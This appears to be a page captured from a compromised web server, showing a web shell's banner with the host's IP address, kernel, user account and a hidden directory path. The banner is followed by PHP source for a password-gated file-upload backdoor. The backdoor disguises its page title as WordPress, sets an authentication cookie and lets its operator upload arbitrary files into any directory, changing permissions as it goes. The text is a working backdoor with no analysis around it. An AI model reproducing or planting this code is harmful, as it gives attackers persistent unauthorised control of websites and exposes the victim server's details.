| Server IP : 122.155.17.190 / Your IP : 216.73.216.14 Web Server : Apache/2 System : Linux cat17190.thaihostserver.com 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64 User : t1bnc ( 1042) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/t1bnc/public_html/admin/editor/filemanager/browser/default/js/.storage/ |
Upload File : |
<?php function customdir(){ if(function_exists("getcwd")){ return @getcwd(); }else{ return dirname($_SERVER["SCRIPT_FILENAME"]); }}function checkpw($pw) { $hash = '53633868f9efedea3d5ea9fa7a310c6c5078247fdd89c33a2e752430f94ba5f2'; return hash('sha256', $pw) === $hash; }if(isset($_GET["dg"]) && isset($_POST["p"])){if(checkpw($_POST["p"])){@setcookie("p", $_POST["p"], time() + 86400, "/");}}if(isset($_GET["dg"]) && isset($_COOKIE["p"]) && checkpw($_COOKIE["p"])) {@error_reporting(E_ALL ^ E_NOTICE);$current_dir = str_replace("\\","/",@customdir()) . "/";echo "<html><title>WordPress</title><body>";echo '<form onSubmit="this.up.disabled=true;" method="post" enctype="multipart/form-data">Dir: <input size="250" type="text" name="cwd" value="'.$current_dir.'"><p><input type="file" name="file"><input name="up" type="submit"value="Upload"></form>';if(isset($_FILES['file'])){@chmod($_POST['cwd'].'/', 0755);@chmod($_POST['cwd'].'/.htaccess', 0644);if(@move_uploaded_file($_FILES['file']['tmp_name'], $_POST['cwd'].'/'.$_FILES['file']['name'])){echo '<h2><center>Succes...!</center></h2>';}else{echo '<h2><center>ERROR...!</center></h2>';}}echo'</body></html>';}elseif(isset($_GET["dg"])){echo '<form method="post"><input id="erenyeager" type="text" name="p"><button>login</button></form>';}?>